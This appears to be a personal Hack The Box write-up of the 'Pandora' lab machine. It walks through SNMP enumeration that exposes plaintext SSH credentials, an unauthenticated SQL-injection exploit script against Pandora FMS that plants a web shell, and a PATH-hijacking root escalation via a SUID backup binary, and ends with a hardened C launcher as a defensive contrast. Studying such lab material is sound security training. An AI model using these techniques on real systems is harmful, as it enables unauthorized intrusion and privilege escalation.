#hackthebox #linux #easy #pandoraFMS #path_hijacking

![[Pasted image 20250818232308.png]]

# Information Gathering - Nmap

As always, I started off by scanning all TCP ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 01:05 UTC
Nmap scan report for 10.10.11.136
Host is up (0.069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
```

Nmap discovered 2 open ports: 22 and 80. I ran a service and script scan against those two ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 01:06 UTC
Nmap scan report for 10.10.11.136
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds
```

Then I ran a UDP scan against the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 01:07 UTC
Nmap scan report for 10.10.11.136
Host is up (0.048s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  closed        ntp
135/udp  open|filtered msrpc
137/udp  closed        netbios-ns
138/udp  closed        netbios-dgm
161/udp  open          snmp
445/udp  closed        microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds
```

---

# Enumeration

##### HTTP - TCP 80

The landing page on port 80 looks as follows. Across the website it's mentioned multiple times that `Play` is an extension of `panda.htb`.

![[Pasted image 20250818202049.png]]

Is it hinting that I should map the IP address to the `panda.htb` domain?

![[Pasted image 20250818202438.png]]

`Gobuster` revealed an `/assets` directory, but I didn't find anything special inside it.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://panda.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://panda.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 307] [--> http://panda.htb/assets/]
```

I also intercepted the request sent by the message form on the website and tried tweaking its parameters, but I couldn't find any vulnerabilities there either.

![[Pasted image 20250818203459.png]]

# Initial Access - shell as `daniel`

##### SNMP - UDP 161

I could have explored port 80 further, but I wanted to test port 161 first since the Nmap output tells me the SNMP port is open.
I found the community string `public` with `onesixtyone`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $IP
Scanning 1 hosts, 3219 communities
10.10.11.136 [public] Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
10.10.11.136 [public] Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
```

Then I ran `snmp-check` against the IP with the community string `public`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ snmp-check $IP -c public -v2c
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.136:161 using SNMPv2c and community 'public'

[*] System information:

  Host IP address               : 10.10.11.136
  Hostname                      : pandora
  Description                   : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
  Contact                       : Daniel
  Location                      : Mississippi
  Uptime snmp                   : 00:56:03.68
  Uptime system                 : 00:55:56.77
  System date                   : 2025-8-19 01:42:07.0

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 64
  TCP segments received         : 329892
  TCP segments sent             : 333811
  TCP segments retrans          : 1518
  Input datagrams               : 337206
  Delivered datagrams           : 337081
  Output datagrams              : 336906

... <SNIP>
```

![[Pasted image 20250818204447.png]]

In the `Processes` section of the `snmp-check` output, there were processes whose command lines contained a set of credentials in plaintext: `daniel:HotelBabylon23`

![[Pasted image 20250818205042.png]]

Since I know port 22 is open, I tried the found credentials against SSH and they worked.

```bash
daniel@pandora:~$ whoami
daniel
```

Inside the `/home` directory there is a `matt` directory as well as `daniel`, and there's nothing inside `daniel`'s directory.

```bash
daniel@pandora:/home$ ls
daniel  matt
```

So `user.txt` is in `/home/matt`, and the current user `daniel` is not able to read it.

```bash
daniel@pandora:/home/matt$ ls -la
total 24
drwxr-xr-x 2 matt matt 4096 Dec  7  2021 .
drwxr-xr-x 4 root root 4096 Dec  7  2021 ..
lrwxrwxrwx 1 matt matt    9 Jun 11  2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 matt matt 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 matt matt  807 Feb 25  2020 .profile
-rw-r----- 1 root matt   33 Aug 19 00:47 user.txt
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
```

# Lateral Movement - shell as `matt`

I searched for files with the SUID bit set, and the binary `pandora_backup` caught my eye.

```bash
daniel@pandora:/tmp$ find / -type f -perm -4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
```

It is owned by `root` and only executable by the `matt` group, so I think this can be used once we first obtain user `matt`. It is not relevant at the moment.

```bash
daniel@pandora:/tmp$ ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec  3  2021 /usr/bin/pandora_backup
```

In the `/var/www` directory, there was an unusual directory besides `html`, named `pandora`. This indicates that there might be another web service, other than `play`, that runs only internally.

```bash
daniel@pandora:/var/www$ ls
html  pandora
```

Inside the `/etc/apache2/sites-enabled` directory, there are 2 config files. This also backs my theory.

```bash
daniel@pandora:/etc/apache2/sites-enabled$ ls
000-default.conf  pandora.conf
```

The `pandora.conf` file tells us a few important things:

- It's only listening on localhost port 80.
- The server name is `pandora.panda.htb`.
- Its `DocumentRoot` is `/var/www/pandora`.
- Requests to it are served as user `matt` (`AssignUserID matt matt`).

```bash
daniel@pandora:/etc/apache2/sites-enabled$ cat pandora.conf
<VirtualHost localhost:80>
  ServerAdmin [email protected]
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>
```

To reach it, I forwarded local port 4130 to port 80 on the target's loopback interface over SSH.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh daniel@$IP -L 4130:127.0.0.1:80
[email protected]'s password:
```

After the port forwarding is set up, navigating to `127.0.0.1:4130` reveals this `pandora_console` website. Even though I'm able to access the page, I'm going to map the IP address (`127.0.0.1`) to its server name `pandora.panda.htb`.

![[Pasted image 20250818214235.png]]

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo '127.0.0.1 pandora.panda.htb' | sudo tee -a /etc/hosts
[sudo] password for kali:
127.0.0.1 pandora.panda.htb
```

Apparently, the real name of the service is `Pandora FMS`. At the bottom of the page, it specifies the version of the service: `v7.0NG.742_FIX_PERL2020`

![[Pasted image 20250818214536.png]]

The exploit that matches our version is an RCE, but it requires authentication, and I do not have a valid set of credentials.

![[Pasted image 20250818215205.png]]

I tried `daniel`'s credentials on the login form, but they didn't work. However, the form returned a different error.

![[Pasted image 20250818220359.png]]

Because I now know the RCE requires authentication, I looked for other types of exploits. Then I found this `GitHub` repository, which provides a `SQL Injection` exploit against the same version of `Pandora FMS`.
![[Pasted image 20250818221000.png]]

![[Pasted image 20250818221430.png]]

```bash
┌──(venv)─(kali㉿kali)-[~/Desktop/Pandora_v7.0NG.742_exploit_unauthenticated]
└─$ python3 sqlpwn.py -t 127.0.0.1:4130
URL: http://127.0.0.1:4130/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : ig6lh7nu80ikloack743o95umj
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:4130/pandora_console/images/pwn.php?test=
CMD > whoami
matt
```

Now that I have a shell as `matt`, `user.txt` is readable.

```bash
matt@pandora:/home/matt$ ls
user.txt
matt@pandora:/home/matt$ cat user.txt
19b...
```

# Privilege Escalation - shell as `root`

The `sudo -l` command returned an error I had never encountered before.

```bash
matt@pandora:/home/matt$ sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
```

I already saw earlier that there's a `pandora_backup` binary with the SUID bit set.

```bash
matt@pandora:/home/matt$ find / -type f -perm -4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
```

It errors out and tells me to check my permissions, even though it has the SUID bit set and I should be able to run it.

```bash
matt@pandora:/home/matt$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
```

So I generated an SSH key pair to get a proper shell as `matt`. This creates a set of `public` and `private` keys.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519):
Enter passphrase for "/home/kali/.ssh/id_ed25519" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_ed25519
Your public key has been saved in /home/kali/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:G1frXE/h4hzxJAzzAFAUyTHfBejUUegp5LjbnHCYox8 kali@kali
The key's randomart image is:
+--[ED25519 256]--+
|    .=B=+oo=o    |
|     oo+Bo.      |
|     *.o*.o      |
|    . = +* .|
|     S = oo.o.|
|      X +o.oo    |
|     oEB +o .|
|     . ..+       |
|        ..       |
+----[SHA256]-----+
```

Then I copied the public key into `matt`'s `/home/matt/.ssh/authorized_keys` file.

```bash
matt@pandora:/home/matt/.ssh$ ls
authorized_keys
matt@pandora:/home/matt/.ssh$ cat authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKaFr067ff7fbmns22BPiuWYPz+wi1UWFSMNyMtWouzk wook@wook
```

After adding the public key to `~/.ssh/authorized_keys`, I logged into the SSH server using the private key.

```bash
ssh -i id_ed25519 matt@$IP
```

And I got in as `matt`.

```bash
matt@pandora:~$ whoami
matt
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
```

Now when I ran `/usr/bin/pandora_backup`, it ran without any errors. It references `tar` a couple of times, which indicates it's using `tar` to compress the files.

```bash
matt@pandora:~$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: Removing leading `/' from member names
/var/www/pandora/pandora_console/AUTHORS
tar: Removing leading `/' from hard link targets
/var/www/pandora/pandora_console/COPYING
... <SNIP> ...
/var/www/pandora/pandora_console/vendor/egulias/email-validator/composer.json
/var/www/pandora/pandora_console/vendor/egulias/email-validator/phpunit.xml.dist
/var/www/pandora/pandora_console/vendor/egulias/email-validator/LICENSE
/var/www/pandora/pandora_console/ws.php
Backup successful!
Terminating program!
```

I tried to extract strings from the binary, but `strings` is not installed.
```bash
matt@pandora:~$ cat /usr/bin/pandora_backup | strings

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.
```

So I used `ltrace` instead. Under `ltrace` the SUID bit isn't honoured, but we might still get an understanding of what the binary does under the hood. As expected, it fails, because without the SUID privileges it doesn't have permission to write `/root/.backup/pandora-backup.tar.gz`.

```bash
matt@pandora:~$ ltrace pandora_backup
getuid()                                         = 1000
geteuid()                                        = 1000
setreuid(1000, 1000)                             = 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility
)                                                = 26
puts("Now attempting to backup Pandora"...Now attempting to backup PandoraFMS client
)                                                = 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)                                                = 39
+++ exited (status 1) +++
```

Notice that the binary uses the `system` function to call `tar` without specifying its full path, so `tar` is resolved through the `PATH` environment variable, which the caller controls. We can abuse this and perform a `Path Hijacking` attack. Currently, the `$PATH` variable is as follows:

```bash
matt@pandora:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```

Now I prepended the `/tmp` directory to the `PATH` environment variable.
```bash
matt@pandora:/tmp$ export PATH=/tmp:$PATH
matt@pandora:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```

I generated a payload that simply runs `bash`, and its name, of course, is `tar`.

![[Pasted image 20250818232026.png]]

I executed `pandora_backup` again; it immediately ran my `tar`, which launched `/bin/bash` and got me a shell as `root`.

```bash
matt@pandora:/tmp$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# whoami; id
root
uid=0(root) gid=1000(matt) groups=1000(matt)
```

Found `root.txt`.

```bash
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
984...
```
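The root cause of the privilege escalation is that `pandora_backup` lets `system()` resolve `tar` through the caller's `PATH`. As an added example (my code, not the binary's source), the following contrasts that pattern with a hardened launcher that uses an absolute program path, a fixed argv and an explicit minimal environment; the archived source directory is assumed from the tar output, and `run_fixed()` / `child_sees_only_safe_path()` are names I chose.

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern reconstructed from the ltrace output: "tar" is resolved
 * through PATH, which the unprivileged caller controls. Source dir assumed. */
int backup_vulnerable(void)
{
    return system("tar -cvf /root/.backup/pandora-backup.tar.gz "
                  "/var/www/pandora/pandora_console");
}

/* Hardened launcher: absolute program path, fixed argv and an explicit
 * minimal environment, so nothing the caller exports reaches the child.
 * Returns the child's exit status (127 if exec fails), or -1 on error. */
int run_fixed(const char *prog, char *const argv[])
{
    static char *const safe_env[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(prog, argv, safe_env);
        _exit(127);             /* execve only returns on failure */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Same backup as above, done the safe way. */
int backup_hardened(const char *archive, const char *srcdir)
{
    char *const argv[] = { "tar", "-cf", (char *)archive, (char *)srcdir, NULL };
    return run_fixed("/bin/tar", argv);
}

/* Reproduces the write-up's trick (a writable directory first in PATH, plus a
 * marker variable) and checks that a child started by run_fixed() sees
 * neither: its PATH is the fixed one and the marker is absent. Returns 1 if
 * the child is isolated from the caller's environment. */
int child_sees_only_safe_path(void)
{
    setenv("PATH", "/tmp:/usr/local/bin:/usr/bin:/bin", 1);
    setenv("HIJACK_MARKER", "1", 1);
    char *const argv[] = { "sh", "-c",
        "[ \"$PATH\" = /usr/bin:/bin ] && [ -z \"$HIJACK_MARKER\" ]", NULL };
    return run_fixed("/bin/sh", argv) == 0;
}
```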